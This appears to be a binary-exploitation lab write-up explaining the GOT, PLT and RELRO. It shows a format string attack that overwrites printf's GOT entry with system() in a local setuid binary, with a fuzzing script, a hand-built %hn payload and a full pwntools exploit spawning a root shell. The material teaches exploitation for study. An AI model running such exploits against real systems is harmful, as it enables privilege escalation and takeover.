description |
---|
09/19/2023 |
We're really deep now. Here, we will be focusing on overwriting the Global Offset Table (GOT)! We are going to be using another format string vulnerability, but there will be no buffer overflow this time.
The Global Offset Table (GOT) is a section of a program's memory that enables code compiled as an ELF file to run correctly. Simply put, it is a section inside of the program (ELF) that holds the addresses of functions that are dynamically linked.
This is all independent of the memory address where the program's code or data is loaded at runtime.
The GOT is responsible for mapping symbols (human-readable identifiers when compiled) to their correct addresses to facilitate Position Independent Code (PIC) and Position Independent Executables (PIE).
So, where is the GOT located in memory?
You can find the GOT represented as the `.got` and `.got.plt` sections within the ELF file, which are loaded into the program's memory at the start of execution.
The Operating System's dynamic linker updates the GOT's relocations at program startup or when symbols are being accessed.
Dynamic Resolving
On the first call to a dynamically linked function, the dynamic linker locates the function in its shared library. The result is saved into the GOT so future function calls jump straight to their implementation, bypassing the dynamic resolver.
Implications:
- The GOT contains pointers to libraries which are constantly moved around due to Address Space Layout Randomization (ASLR)
- The GOT is also writeable
What is the Procedure Linkage Table (PLT)?
Before a function's address has been resolved, its GOT entry points back into the PLT. Each PLT entry is a small stub of its own that is responsible for calling the dynamic linker with an identifier for the function that is to be resolved.
Something else to note:
If the binary that we are targeting is compiled with FULL RELRO, we will NOT be able to use this specific technique on the target. However, if it is compiled with PARTIAL RELRO, we will be able to!
What is RELRO?
Relocation Read-Only (RELRO) is a protection to stop any GOT overwrites from taking place.
Partial RELRO:
This will only move the GOT above the program's variables. However, this does not prevent format string overwrites.
Full RELRO:
This makes the GOT completely read-only, so even format string vulnerabilities will not be able to overwrite anything. This is not always enabled by default because it slows program startup: every function address has to be resolved up front, before the GOT is locked down.
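As a rough sketch of how the two modes can be told apart: a binary with a `PT_GNU_RELRO` program header but without the `BIND_NOW` flag is normally reported as Partial RELRO, while one with both is reported as Full RELRO. The function name and its boolean inputs are hypothetical; a real check would read these facts out of the ELF headers.

```python
def classify_relro(has_gnu_relro_segment: bool, has_bind_now: bool) -> str:
    """Classify RELRO from two facts normally read out of the ELF headers."""
    if not has_gnu_relro_segment:
        return "No RELRO"
    if has_bind_now:
        # Every symbol is resolved at load time, then the GOT is made read-only
        return "Full RELRO"
    # Lazy binding is still in use, so .got.plt has to stay writable
    return "Partial RELRO"


# Our target: RELRO segment present, lazy binding still enabled
print(classify_relro(True, False))
```

Only the last case leaves `.got.plt` writable, which is what the rest of this walkthrough relies on.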
{% embed url="https://github.com/Crypto-Cat/CTF/tree/main/pwn/binary_exploitation_101/09-overwriting_got" %}
{% embed url="https://www.youtube.com/watch?v=KgDeMJNK5BU" %} CryptoCat {% endembed %}
{% embed url="https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html" %}
sudo chown root:root got_overwrite
sudo chmod 4655 got_overwrite
sudo chown root:root flag.txt
sudo chmod 600 flag.txt
`file`:
{% code overflow="wrap" %}
file got_overwrite
got_overwrite: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=57da01c938d00b9c9beb3a58299d8c64766d748c, for GNU/Linux 3.2.0, not stripped
{% endcode %}
- 32-bit Binary
- Dynamically linked to `libc`
- Not stripped
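`checksec`:
| RELRO | STACK CANARY | NX | PIE | RPATH | RUNPATH | Symbols | FORTIFY | Fortified | Fortifiable | FILE |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Partial RELRO | Canary found | NX enabled | No PIE | No RPATH | No RUNPATH | 71 Symbols | No | 0 | 2 | got_overwrite |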
- Partial RELRO
  - This pertains to the vulnerability that we will be targeting
  - Maps the `.got` section as read-only (but not `.got.plt`)
- Stack Canary is ENABLED -- A canary value is placed on the stack between the local buffers and the saved return address
  - Before the jump to the return address, the canary value is checked to ensure that it still holds its original value, helping to mitigate buffer overflow attacks
  - If the value is not the same, a stack smashing error will be issued, crashing the program
- NX is ENABLED -- So we do not have an executable stack
We can see that our input is being directly reflected back at us, presumably with `printf()` or something similar.
There must be a `while(true)` loop going on because the program will wait for user input forever and never exit.
Unable to segfault from overflow
There seems to be some kind of buffer/`sizeof()` checking going on since we cannot overflow the buffer.
Keep in mind that I renamed variables, added comments, etc.
`main()`:
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
undefined4 main(void)
{
    int iVar1;
    undefined4 uVar2;
    int in_GS_OFFSET;

    iVar1 = *(int *)(in_GS_OFFSET + 20);
    setuid(0);
    setgid(0);
    /* Vulnerable Functions -- Format String Bug */
    vuln();
    uVar2 = 0;
    if (iVar1 != *(int *)(in_GS_OFFSET + 0x14)) {
        /* Stack Canary -- __stack_chk_fail_local indicates usage of canaries */
        uVar2 = __stack_chk_fail_local();
    }
    return uVar2;
}
- `setuid(0)` and `setgid(0)` ensure that our binary runs with root permissions
- We call `vuln()`, which contains a format string vulnerability (as you will see in the analysis below)
- `__stack_chk_fail_local()` indicates that the binary is protected by a stack canary
`vuln()`:
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */
void vuln(void)
{
    int in_GS_OFFSET;
    char buffer [300];
    undefined4 local_10;

    local_10 = *(undefined4 *)(in_GS_OFFSET + 0x14);
    do {
        /* fgets() reads at most 299 characters plus a null terminator into the
           300-byte buffer, preventing buffer overflow. Also keep in mind canaries are enabled. */
        fgets(buffer,300,_stdin);
        /* No format string was specified -- printf() format string bug identified */
        printf(buffer);
    } while( true );
}
- Instantiate a `char` buffer with a size of 300 bytes
- `fgets()` is given the size of our buffer (300 bytes), so it stores at most 299 characters plus the terminating null byte and nothing more
- `printf(buffer)` is a format string vulnerability because our input is passed as the format string itself instead of as an argument to a fixed format string
- `while( true )` makes the program loop forever
Notice how we have a format string bug (remember, this is because our `printf()` call uses our input as its format string). This means we can supply input that overwrites an entry of the GOT: we can find the address of `printf()` in the GOT and overwrite it with the address of `system()`.
Since we are constrained to an infinite loop, what will happen is:
- We will loop around again
- Take an input from us
- Then, instead of calling `printf()` with the buffer, it will call `system()` with the buffer
- If our buffer is `"/bin/sh"`, this will call `system("/bin/sh")`
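The steps above can be modelled with a toy table of function pointers. This is only an analogy in Python, not the real exploit: `fake_printf`, `fake_system`, and the `got` dictionary are hypothetical stand-ins for the libc functions and the `.got.plt` slot.

```python
# Toy model: the GOT is a writable table of function pointers.
def fake_printf(buf):
    return f"printf prints: {buf}"


def fake_system(buf):
    return f"system runs: {buf}"


got = {"printf": fake_printf}


def vuln_iteration(user_input):
    # The program always calls through whatever the "printf" slot holds
    return got["printf"](user_input)


before = vuln_iteration("hello")
got["printf"] = fake_system          # stands in for the format string write
after = vuln_iteration("/bin/sh")

print(before)
print(after)
```

The program's code never changes; only the pointer it calls through does, which is why the next loop iteration hands our input to `system()`.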
`.got`:
This is the Global Offset Table (GOT). This is where the actual table of offsets is located, as filled in by the linker for external symbols.
`.plt`:
This is the Procedure Linkage Table (PLT). These are stubs that look up the addresses in the `.got.plt` section and either jump to the right address or trigger the code in the linker to look up the address.
`.got.plt`:
This is the GOT for the PLT. It contains the target addresses after they have been looked up, or an address back in the `.plt` to trigger the lookup.
`.plt.got`:
This contains code to jump to the first entry of the `.got`.
The PLT and the GOT work together to perform linking.
For example, when you call `printf()` in C and compile the program as an ELF binary, the call does not go directly to `printf()`. Rather, it is compiled as a call to `printf@plt`, which you can see in GDB:
The GOT is a massive table of addresses, and these are the actual locations in memory of the `libc` functions.
When the PLT gets called, it will read the GOT address and redirect execution from there.
When the address has not been resolved yet, it will coordinate with `ld.so` (A.K.A. the dynamic linker/loader shared object) to get the function address and store it in the GOT.
Calling the PLT address of a function is the same as simply calling the function itself.
The GOT contains the addresses of functions in `libc`, and the GOT itself is within the binary.
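A minimal sketch of this lazy binding behaviour, written as a Python simulation and not as the real loader logic. The two addresses are the ones that appear in the GDB session in this write-up; the dictionary names and `call_via_plt` are hypothetical.

```python
LIBC = {"fgets": 0xF7D3D690}   # resolved address, as reported by GDB in this write-up
PLT_STUB = 0x08049046          # fgets@plt+6, the value the GOT slot holds at first

got = {"fgets": PLT_STUB}
resolver_calls = []            # records every trip through the dynamic linker


def call_via_plt(name):
    """Return the address execution ends up at when name@plt is called."""
    target = got[name]
    if target == PLT_STUB:
        # First call: the slot still points back into the PLT, so resolve it
        resolver_calls.append(name)
        got[name] = LIBC[name]   # the result is cached in the GOT
        target = got[name]
    return target


first = call_via_plt("fgets")
second = call_via_plt("fgets")
print(hex(first), hex(second), resolver_calls)
```

Both calls land on the same address, but the resolver runs only once because the second call finds the cached pointer.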
After viewing the disassembly for a particular function, I was able to locate `fgets()`, set a breakpoint, and view the inside of the PLT in `gdb`. After stepping into it, we can see a jump instruction that acts as a call through a function pointer: it dereferences the pointer and jumps to the resulting address.
Remember, if ASLR is enabled on your machine, you will get different addresses each time you run the binary.
info functions
0x08049040 fgets@plt
b *0x08049040
r
We can see that since we set a breakpoint at our `fgets@plt` function, that is where our instruction pointer (`EIP`) will stay until we continue execution.
We can use the following command to explicitly view the instruction that places us in the PLT:
x/i $pc
or
x/i $eip
=> 0x8049040 <fgets@plt>: jmp DWORD PTR ds:0x804c010
We then see a `jmp` instruction to a specific address.
However, this is not an ordinary `jmp` instruction; this is what it looks like when a function pointer is being used.
NOTE: This pointer is in the `.got.plt` section of the binary.
We can then view the dereference:
x/wx 0x804c010
0x804c010 <fgets@got.plt>: 0x08049046
Follow the `jmp`:
x/2i $pc
=> 0x8049046 <fgets@plt+6>: push 0x8
0x804904b <fgets@plt+11>: jmp 0x8049020
We can see that we immediately jumped to the next instruction. This is because we have not called `fgets()` before and we need to trigger the lookup first.
It will push the number `0x8` onto the stack and then jump to the routine that looks up the symbol.
This all happens at the beginning of the `.plt` section.
Let's find out what this stub does:
x/2i $pc
=> 0x8049020: push DWORD PTR ds:0x804c004
0x8049026: jmp DWORD PTR ds:0x804c008
We push the value of the second entry in `.got.plt` onto the stack and then jump to the address stored in the third entry.
x/2x 0x804c004
0x804c004: 0xf7f4aa40 0xf7f25fe0
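To keep the slots straight, here is a small sketch of the `.got.plt` layout implied by the addresses above. It assumes the table starts at `0x0804c000` (inferred from `0x804c004` being the second entry), that the first three slots are reserved for the dynamic linker, and that relocation entries and GOT slots appear in the same order, which is typical on i386 but not guaranteed. The helper names are hypothetical.

```python
GOT_PLT_BASE = 0x0804C000   # assumed: 0x804c004 is described as the second entry
WORD = 4                    # 32-bit pointers
RESERVED = 3                # slots 0-2 are used by the dynamic linker
REL_SIZE = 8                # size of one Elf32_Rel entry on i386


def slot_index(addr):
    """Zero-based index of a .got.plt slot given its address."""
    return (addr - GOT_PLT_BASE) // WORD


def slot_for_reloc_offset(reloc_offset):
    """GOT slot address matching the value a PLT stub pushes before the lookup."""
    return GOT_PLT_BASE + (RESERVED + reloc_offset // REL_SIZE) * WORD


print(slot_index(0x0804C004), slot_index(0x0804C008))
print(hex(slot_for_reloc_offset(0x8)))   # the value pushed by fgets@plt
print(hex(slot_for_reloc_offset(0x0)))
```

Under these assumptions the `push 0x8` in `fgets@plt` maps to `0x804c010`, the same slot the first `jmp` dereferenced, and offset `0x0` maps to `0x804c00c`.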
We can obtain the PID of the binary we are currently debugging by running `info inferiors` inside of `pwndbg`.
info inferiors
Num Description Connection Executable
* 1 process 12579 1 (native)
- PID is 12579
We can then read from `/proc/pid/maps` for more information.
cat /proc/12579/maps
We can then see that the first entry points into the data segment of `ld.so` and the second into its executable region.
In other words, we are asking the dynamic linker to look up the `fgets()` symbol. These two addresses in the `.got.plt` section are populated by the linker/loader (`ld.so`) at the time it is loading the binary.
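Matching an address against the `maps` output by eye is error-prone, so here is a short helper sketch. `find_mapping` is a hypothetical name, and `SAMPLE_MAPS` is a made-up excerpt in the `/proc/<pid>/maps` format (its ranges, inode, and offsets are illustrative, not captured from the real process).

```python
def find_mapping(maps_text, addr):
    """Return (perms, path) of the mapping that contains addr, or None."""
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        start_s, end_s = fields[0].split("-")
        if int(start_s, 16) <= addr < int(end_s, 16):
            path = fields[5] if len(fields) > 5 else ""
            return fields[1], path
    return None


# Hypothetical excerpt: real ranges differ on every run
SAMPLE_MAPS = """\
f7f17000-f7f18000 r--p 00000000 08:01 1234 /lib/ld-linux.so.2
f7f18000-f7f3b000 r-xp 00001000 08:01 1234 /lib/ld-linux.so.2
f7f49000-f7f4b000 rw-p 00031000 08:01 1234 /lib/ld-linux.so.2
"""

data_entry = find_mapping(SAMPLE_MAPS, 0xF7F4AA40)
code_entry = find_mapping(SAMPLE_MAPS, 0xF7F25FE0)
print(data_entry)
print(code_entry)
```

With real output you would pass the contents of `/proc/12579/maps` instead of the sample string.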
If we step through the instructions a few times using `ni`, we will ultimately get to `fgets()`.
info symbol $pc
fgets in section .text of /lib/i386-linux-gnu/libc.so.6
Let's print out our stack:
x/4wx $esp
We can actually get from main to `fgets()` very quickly just by using the disassembly of `fgets@plt`.
disass 'fgets@plt'
Dump of assembler code for function fgets@plt:
0x08049040 <+0>: jmp DWORD PTR ds:0x804c010
0x08049046 <+6>: push 0x8
0x0804904b <+11>: jmp 0x8049020
End of assembler dump.
x/wx 0x804c010
0x804c010 <fgets@got.plt>: 0xf7d3d690
info symbol 0xf7d3d690
fgets in section .text of /lib/i386-linux-gnu/libc.so.6
We can see that a call to `fgets@plt` will now result immediately in a `jmp` to the `fgets()` address loaded via dynamic linking from `libc`.
So, how did the `.got.plt` get updated? This is why the pointer at the beginning of the GOT was passed as an argument back to `ld.so`: `ld.so` did its black magic and inserted the proper address into the GOT, replacing the previous address, which pointed to the next instruction in the PLT.
Since our ultimate goal is to take control of the flow of execution of the program, we need to remember that the `.got.plt` section is a giant array of function pointers.
So, could we overwrite one of these and control execution from there?
Any memory corruption primitive that will let you write to an arbitrary address will allow you to overwrite a GOT entry.
Ultimately, `.got.plt` is a very attractive target for format string bugs and other arbitrary write exploits.
When your target binary lacks PIE, the `.got.plt` is loaded at a fixed address.
Enabling FULL RELRO will protect against these kinds of attacks by preventing writes to the GOT, but it slows program startup because every symbol must be resolved up front.
Printing values off of the stack with the format string bug:
%p %p %p
0x12c 0xf7f80620 0x80491b1
%s
Segmentation fault
Why did this happen?
We are able to print pointers from the stack by using `%p` as the format specifier.
However, `%s` treats the first value on the stack, `0x12c`, as a pointer and tries to print the string stored at that address. This results in a segmentation fault because `0x12c` is NOT a valid (mapped) location in memory.
Read more about Format String Vulnerabilities here:
{% embed url="https://axcheron.github.io/exploit-101-format-strings/" %}
`fuzz.py`:
from pwn import *

# This will automatically get context arch, bits, os etc
elf = context.binary = ELF('./got_overwrite', checksec=False)

# Create process (level used to reduce noise)
p = process(level='error')

# Let's fuzz x values
for i in range(100):
    try:
        # Format the counter
        # e.g. %2$s will attempt to print [i]th pointer/string/hex/char/int
        p.sendline('%{}$x'.format(i).encode())
        # Receive the response
        result = p.recvline().decode()
        # If the item from the stack isn't empty, print it
        if result:
            print(str(i) + ': ' + str(result).strip())
    except EOFError:
        pass
This script will iterate 100 times and fuzz `%<i>$x`, printing out values on the stack in hex format.
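As a small aside, the probe strings themselves can be generated without pwntools. The helper below is a hypothetical sketch; it numbers the positions from 1 because positional arguments in format strings are 1-based.

```python
def make_probes(count, conversion="x"):
    """Return positional format-string probes such as b'%1$x', b'%2$x', ..."""
    # Positional arguments are numbered from 1
    return [f"%{i}${conversion}".encode() for i in range(1, count + 1)]


probes = make_probes(5, "p")
print(probes)
```

Each element can be sent as one line of input, exactly like the strings built inside the loop of `fuzz.py`.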
We want to focus on the `%n` format specifier, which writes the number of characters printed so far to the address supplied as its argument.
When performing this kind of technique, we want to fuzz and print out values on the stack when injecting arbitrary data to see where our data/input ends up.
We can incrementally utilize position-based parameters with our input and print out or inject in a specific part of the stack.
See an example below:
Pay attention to the decrementing value immediately after the `%`. We start with `%6` and go to `%4` in order to identify where our input ends up on the stack.
./got_overwrite
AAAA%6$p
AAAA0xf7fb000a
AAAA%5$p
AAAA0x70243525
AAAA%4$p
AAAA0x41414141
Okay cool, what is 41414141 converted to ASCII?
We can use the pwntools tool `unhex 41414141` to figure this out: `AAAA`!
Great, we have identified where our data is being injected onto the stack.
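The same decoding can be done with only the Python standard library, shown here as a quick sketch in place of the pwntools `unhex` tool. It also decodes the value seen at `%5$p`, which turns out to be part of our own format string stored in little-endian order. `dword_to_bytes` is a hypothetical helper name.

```python
import struct


def dword_to_bytes(value):
    """Show a 32-bit stack value as the bytes it occupies in little-endian memory."""
    return struct.pack("<I", value)


print(bytes.fromhex("41414141"))     # plain hex-to-bytes conversion
print(dword_to_bytes(0x41414141))    # value printed for %4$p
print(dword_to_bytes(0x70243525))    # value printed for %5$p
```

Seeing our own bytes at offsets 4 and 5 confirms that the start of the buffer sits at position 4.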
So we need to work out at which position our input lands on the stack, so that we can place an address there and reference it with the `%n` write operation.
We can use the following methodology to help us craft an exploit manually:
{% code overflow="wrap" %}
# Need to overwrite 0x0804c00c (GOT.printf) with 0xf7dff040 (LIBC.system)
# It means writing 0xf7df (63455) @ 0x0804c00c + 2 = 0x0804c00e (high order)
# and 0xf040 (61504) @ 0x0804c00c (low order)
# Now, we have to figure out the value to set for the padding. Here is the formula :
[The value we want] - [The bytes already written] = [The value to set].
# Let’s start with the low order bytes :
It’ll be 61504 - 8 = 61496, because we already wrote 8 bytes (the two 4 bytes addresses).
# Then, the high order bytes :
It’ll be 63455 - 61504 = 1951, because we already wrote 61504 bytes (the two 4 bytes addresses and 61496 bytes from the previous writing).
# Now we can construct the exploit (note our write offset is %4 so we want [%4,%5] as offsets instead of [%7,%8]) :
It’ll be : \x0c\xc0\x04\x08\x0e\xc0\x04\x08%61496x%4$hn%1951x%5$hn. Let me explain :
\x0c\xc0\x04\x08 or 0x0804c00c (in reverse order) points to the low order bytes.
\x0e\xc0\x04\x08 or 0x0804c00e (in reverse order) points to the high order bytes.
%61496x will write 61496 bytes on the standard output.
%4$hn will write 8 + 61496 = 61504 bytes (or 0xf040) at the first address specified (0x0804c00c).
%1951x will write 1951 bytes on the standard output.
%5$hn will write 8 + 61496 + 1951 = 63455 (or 0xf7df) at the second address specified (0x0804c00e).
python2 -c 'print("\x0c\xc0\x04\x08\x0e\xc0\x04\x08%61496x%4$hn%1951x%5$hn")' > payload
* Based on excellent blogpost: https://axcheron.github.io/exploit-101-format-strings/
{% endcode %}
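The arithmetic in the notes above can be sketched as a small standard-library function. This is a simplified illustration, not a replacement for pwntools: `build_hn_payload` is a hypothetical name, it only handles two 16-bit writes on a 32-bit target, and it refuses cases that would need wrap-around or very small padding.

```python
import struct


def build_hn_payload(target, value, first_offset):
    """Build a two-write %hn payload that stores a 32-bit value at target."""
    low, high = value & 0xFFFF, value >> 16
    # (address, 16-bit value) pairs, smallest value first so the count only grows
    writes = sorted([(target, low), (target + 2, high)], key=lambda w: w[1])

    # The addresses go first; they are the arguments the %hn writes refer to
    payload = b"".join(struct.pack("<I", addr) for addr, _ in writes)
    written = len(payload)

    for i, (_, wanted) in enumerate(writes):
        pad = wanted - written
        if pad < 8:
            # %Nx prints at least N characters; below 8 a wide value could print more
            raise ValueError("padding too small for this simple sketch")
        payload += f"%{pad}x%{first_offset + i}$hn".encode()
        written = wanted
    return payload


payload = build_hn_payload(0x0804C00C, 0xF7DFF040, 4)
print(payload)
```

For the addresses used in the notes, this yields the same bytes as the `python2` one-liner: two addresses, then `%61496x%4$hn%1951x%5$hn`.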
Obtaining GOT.printf address:
Load the binary in Ghidra, open up the Program Tree, and inside of `.got.plt` you will see an EXTERNAL reference to `printf()`. Use that address, and you will have your `GOT.printf` address.
Program Trees
Listing View // Obtaining `GOT.printf` address
Obtain `libc` base address:
ldd got_overwrite
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7d7f000)
`exploit.py`:
from pwn import *
from pwnlib.fmtstr import FmtStr, fmtstr_split, fmtstr_payload


# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)


# Function to be called by FmtStr
def send_payload(payload):
    io.sendline(payload)
    return io.recvline()


# Specify your GDB script here for debugging
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())

# Set up pwntools for the correct architecture
exe = './got_overwrite'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'debug'

# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================

io = start()

# Found manually (ASLR_OFF)
libc = elf.libc
libc.address = 0xf7d7f000  #0xf7e02150 #0xf7dba000 # ldd got_overwrite

# Find the offset for format string write
format_string = FmtStr(execute_fmt=send_payload)
info("format string offset: %d", format_string.offset)

# Print address to overwrite (printf) and what we want to write (system)
info("address to overwrite (elf.got.printf): %#x", elf.got.printf)
info("address to write (libc.functions.system): %#x", libc.symbols.system)

# Overwrite printf() in GOT with Lib-C system()
# Manual, like in notes.txt
# format_string.write(0x0804c00c, p16(0xf040))  # Lower-order
# format_string.write(0x0804c00e, p16(0xf7df))  # Higher-order

# Or automagically
format_string.write(elf.got.printf, libc.symbols.system)

# Execute the format string writes
format_string.execute_writes()

# Get our flag!
io.sendline(b'/bin/sh')
io.interactive()
Successful Exploitation